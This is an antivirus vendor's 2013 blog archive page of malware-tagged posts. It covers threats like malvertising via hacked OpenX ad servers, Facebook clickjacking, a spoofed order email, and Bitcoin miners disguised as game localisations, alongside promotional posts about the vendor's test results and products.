Protecting over 200 million PCs, Macs, & Mobiles – more than any other antivirus

Archive

Posts Tagged ‘malware’
November 14th, 2013

Malvertising and OpenX servers

Monster-iconMalvertising is an abbreviation of malicious advertising and means that legitimate sites spread malware from their infected advertisement systems. There were many malvertising campaigns in last few years, some of them confirmed even on big sites like The New York Times, but most of them go unnoticed because they are well hidden and served only to selected users. Earlier this year, one of our top analysts found a stealth infection on a Czech entertainment site and began to watch it. We were able to obtain source code from infected sites, and I would like to show you how easily hacking is done and what can be done to secure your server.

In this case all infected servers contained OpenX (open source solution for advertisement) which has a rich history of vulnerabilities. Look, for example, at last three versions.

  • In version 2.8.9 and previous versions there was a SQL injection
  • Version 2.8.10 contained a hidden backdoor that allowed remote PHP execution
  • The latest version 2.8.11 offers more security, but there are known vulnerabilities

In summer 2013, OpenX was re-branded as Revive Adserver and several security flaws were patched. I strongly recommend you update to the latest version (currently 3.0.0) to secure your advertisement solution from being misused by hackers.

How do they get in?

An analysis of infected web pages revealed that the attacker used SQL injection to obtain administrator log ins and passwords from the database. Then he used credentials to log in and exploited another flaw to upload a backdoor with executable extension. Actually there were more backdoors and PHP scripts hidden in various places suggesting that this server was attacked multiple times.

mv-files

This picture shows all scripts and their dates of creation found on the infected page. The first three files are backdoors and tools for server control. The last two files are different; they serve as an interface to the database.

Files “inj” and “minify” seem to be two versions of the same script, which connects to the database and either removes injected scripts or add new ones. The result of this modification is an iframe appended to advertisement banners. The picture below shows a SQL query used to insert malicious java-script.

mv-sqlThe described infection is really hard to trace, because it’s not present on the server all the time, but only in predefined times and shows only to users coming from specific zone. Read more…

Comments off
October 28th, 2013

Facebook Clickjacking: Will You Like Me?

FB_meme“Who wouldn’t want to have more likes on their Facebook page?” This is the motivation of a very trivial code to get more likes, but while other methods usually comprise of adding better content or advertising, this one is a bit easier, and much dirtier. Why not show the like button directly beneath your mouse cursor as you browse a website, make it invisible, and move it as you move your mouse?

The only thing the victim has to do is click; if they are logged in to Facebook, they will automatically like the Facebook page. And of course, it is not only about the number of likes, but each like means the victim will get all the information about this page on their news feed (until they unlike the page), and all friends will also see that you like it – so why not check it out themselves?

FB_clickjack_Like_ButtonThis method is possible due to Like Button, a social plugin for Facebook, made by Facebook developers. It is used properly on many legitimate sites, but when combined with CSS hiding and JS moving, the victim has no other chance. If you want to know how to minimize the impact of such tactics, or if you are more into technical details, read on.

Read more…

Comments off
October 16th, 2013

Fake email spoofs AVAST

Malware samples received in the avast! Virus Lab Wednesday show that a spoofed email which looks like it has been sent from AVAST is spreading widely. Fortunately, AVAST detects this malware as Win32:Malware[Gen] and has been blocking the virus since 12:45 pm yesterday.

The email’s subject header says, “Your Order details and Additional information,” and the email message contains standard text that is sent when a person purchases a license from AVAST. The message includes an order number that is not authenticated and does not exist in the AVAST database.

The sender’s email address is noreply@avast.com. This is a fake email address and was not created by AVAST. The email contains an attachment titled avast-Antivirus-Order-Details.zip. The attachment is a file that includes two file extensions – *.PDF.EXE – which is malware.

Our worldwide CommunityIQ sensors automatically detected and provided information to the avast! Virus Lab about these suspicious files, and the new threat was detected and neutralized immediately. So far, our virus lab has received 12,500 malware samples.

Avoid this attack by downloading the new avast! Antivirus 2014 for free.

October 8th, 2013

avast! Free Antivirus for Mac gets first place for malware detection

avast! Free Antivirus for Mac was pitted against 35 other antivirus products designed for Mac OS, including plenty of pricey solutions,  and came out in first place for detection of malware.free-mac

Compared to Windows, Mac users have been relatively free from malware attacks. But cybercrooks are just as aware as antivirus vendors of the behavior of users and their false sense of security and their habit of browsing the internet without security software. You only have to read this blog to learn that cybercrooks are adapting Windows malware for use on their Mac counterparts.

AVAST aces malware detection test

Over 300 malware samples and 35 applications were used to measure the effectiveness of products built specifically for Mac in a recent SecuritySpread.com test. Multiple machines running different operating systems were used to ensure the reliability of the test, and for real-world results, Macs that are used every day for a range of tasks from web development, media center, movie editing to gaming were included. avast! Free Antivirus for Mac had the highest detection rate among them all. The results can be found here.

The Security Spread test was done with avast! Free Antivirus for Mac 7, but in preparation for the official public release of Mac OS X 10.9, aka Mavericks, avast! Free Antivirus 8.0 has been released.  The changes are mostly under the hood, and it requires version 10.6.8 or newer. Download it here.

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun and contest information, please follow us on FacebookTwitter and Google+.

Categories: Mac Tags: , , ,
September 20th, 2013

Avast! Free Antivirus passes new Antivirus Test with flying colors

cert_133160_avast_freeAVAST is trusted by nearly 200 million people worldwide, and the trifecta of protection, performance, and usability work together to make it the most recommended antivirus protection in the world. If you don’t trust the experiences of 200 million people, how about research from an independent testing lab?

During July and August, when the rest of us were taking vacations at the beach, German lab AV-Test was busily testing 26 home user security products. They focused on realistic test scenarios and challenged the products against real-world threats like detecting brand-new malware, email threats, downloading software, and installing and running programs.

“Avast, once again, has an impressive performance in our tests,” said Andreas Marx, CEO of AV-TEST. Our Facebook fans agree.

FB post2

Avast! Free Antivirus was pitted against mostly paid-for products, and earned the coveted “AV-TEST CERTIFIED” seal for its stellar performance. AVAST scored perfectly in protecting home users from zero-day malware attacks, and identified and blocked all the malware samples AV-Test threw at it.

“The free edition of Avast has shown stellar performance,” said Marx, “The offered protection was a lot better than many commercial anti-malware products. Avast is one of the top products when it comes to malware detection and blocking of known and unknown threats.” Read more…

Comments off
September 11th, 2013

avast! Mobile Security trusted by millions to fight Android malware

50m_en

There have been over 50 million downloads of avast! Mobile Security from Google Play since it was released last year. Android users are becoming more aware of the security and theft issues surrounding their mobile devices, and putting their trust in AVAST. A few weeks ago, avast! Mobile Premium was introduced providing superior back-up and anti-theft technology.

Android is the world’s most widely used mobile operating system (OS). That popularity, together with its open source architecture, makes it a primary target for malware attacks. Android threats make up 79 percent of all known mobile malware, so mobile security should no longer be considered optional.

The avast! Mobile Security Virus Scanner detected 99% of malware with no false positives in a recent test by independent lab AV-Comparatives. That exemplary detection plus the fact that avast! Mobile Security has negligible impact on your smartphone’s performance or battery life, is why we have had 50 million downloads.

mobile malware

How to download avast! Mobile Security

Download avast! Mobile Security from the Google Play store  as the free version or upgrade to avast! Mobile Premium for access to all premium features. avast! Mobile Premium is available for $1.99 per month or $14.99 per year. Download and install on your Android device now.

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun, and contest information, please follow us on FacebookTwitterGoogle+ and Instagram.

Comments off
August 20th, 2013

No problem bro – ransom decryption service

If thieves gain control of sensitive personally identifiable information (PII) on your computer, your identity can be stolen.  Information such as your social security number, driver’s license number, date of birth, or full name are examples of files that should be encrypted.  Confidential business data like individual customer information or intellectual property should also be encrypted for your safety.

In this blog post we will look at a service offering file decryption. This service helps you to decrypt files which were previously encrypted. But this is no helpful ‘Tips and Tricks’ blog for people who forgot the password to their documents and ask for help recovering it. Although breaking weak passwords is quite possible, noproblembro.com specializes in a different type of service.

01-noproblembro

Read more…

Categories: analyses, Virus Lab Tags: , ,
Comments off
August 1st, 2013

Malicious Bitcoin Miners target Czech Republic

Single BitcoinToday we are going to talk to those of you who use Bitcoin digital currency to pay for a variety of goods and services – along with a warning about yet another source of Bitcoin miners – the sharing services. You may think that if you avoid cracks and keygens while browsing the web you will be safe. Well, we would recommend that you reconsider that position. Recently we found that on the uloz.to file sharing service someone uploaded a lot of fake files containing Bitcoin miners!

Bitcoin Mining service

First a little background for the uninitiated: Bitcoins can be obtained by trading real currency, goods, or services with people who have them or alternatively, through mining. The mining process involves running software that performs complex math problems for which you’re rewarded a share of the income. There are a finite amount of Bitcoins to be had, and mining for them can be compared to extracting gold or diamonds from the earth. The more you get, the fewer there are to be had, so it becomes increasingly harder and more expensive. Here’s a descriptive article about mining.

Bitcoin mining services such as bitminter.com use shared computer resources of their users to mine new Bitcoins. In order to participate, the mining users have to create an account and then register their computers (workers) with the service. Then they simply run the Bitcoin miner program provided with their credentials on as many computers as they have. In the end, if they had enough computation power and time they might end up with a few Bitcoins.

It can be expected that some people will not be satisfied just using their own machines so they will try to use the computing power of unsuspecting victims. And that’s exactly what the authors of this malware are doing: They use hardware that does not belong them to generate more money.

It’s not a Bitcoin problem; it’s a people problem

We must stress that there’s nothing wrong with Bitcoin or its mining services. The problem is that some greedy people are misusing them.

Some of them can be seen on the following image.  The word “cestina” means that the file should contain Czech localization of the referenced program. All of them contain a hidden feature, and sometimes the name is a complete fabrication. For example, The-Night-of-the-Rabbit-cestina.exe contains a crack for Call of Duty 4. Notice too, that all these files have an elevated popularity; no doubt a result of tampering. Some downloaders already suspect something fishy about these files.

Uloz.to malicious filesWarning comment on the sharing server.

Read more…

July 11th, 2013

avast! Mobile Security gets Editors’ Choice Award from PC Magazine

pcmag_blogPC Magazine awarded avast! Mobile Security the Editors’ Choice Award for free Android security apps thanks to its “huge array of powerful tools and fine-grained controls.”

A major concern for smartphone owners is the increasing threat of malicious software targeting Android OS. Max Eddy, software analyst for PC Magazine, writes that, “avast! is well-positioned to guard against new threats that use novel attack vectors we’ve yet to imagine.”

Running quietly in the background, with no system slow-down or stuttering, “avast! will also keep an ever-vigilant eye on your device, warning you as soon as it detects something it doesn’t like,” he writes in his June 2013 review.

But these days, it’s more likely that you will fall victim to theft and loss instead of malware. Eddy explains, “In this department, avast! has an impressive slate of features and controls.”

In case your phone walks off somewhere, you can use the my.avast web portal where you can remotely locate, lock, or wipe your device, and set off the alarm. Eddy said, “I was particularly impressed that the alarm was not only loud, at 96 dB, but also highly illustrative. ‘This phone has been lost or stolen,’ said my S III, cycling between that phrase and what sounded like a Star Trek warning klaxon.”

Make sure you install avast! Mobile Security, the Editors’ Choice for free Android security suites, on your smartphone and tablet. It is available for free in the Google Play store.

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun, and contest information, please follow us on FacebookTwitterGoogle+ and Instagram.

July 3rd, 2013

Fake Flash Player installer spreads via Twitter and Facebook

Recently we identified a threat which uses Twitter and Facebook to spread. The origin of the infection begins by clicking malicious tweets or Facebook posts.

fakeflash_sc01
Read more…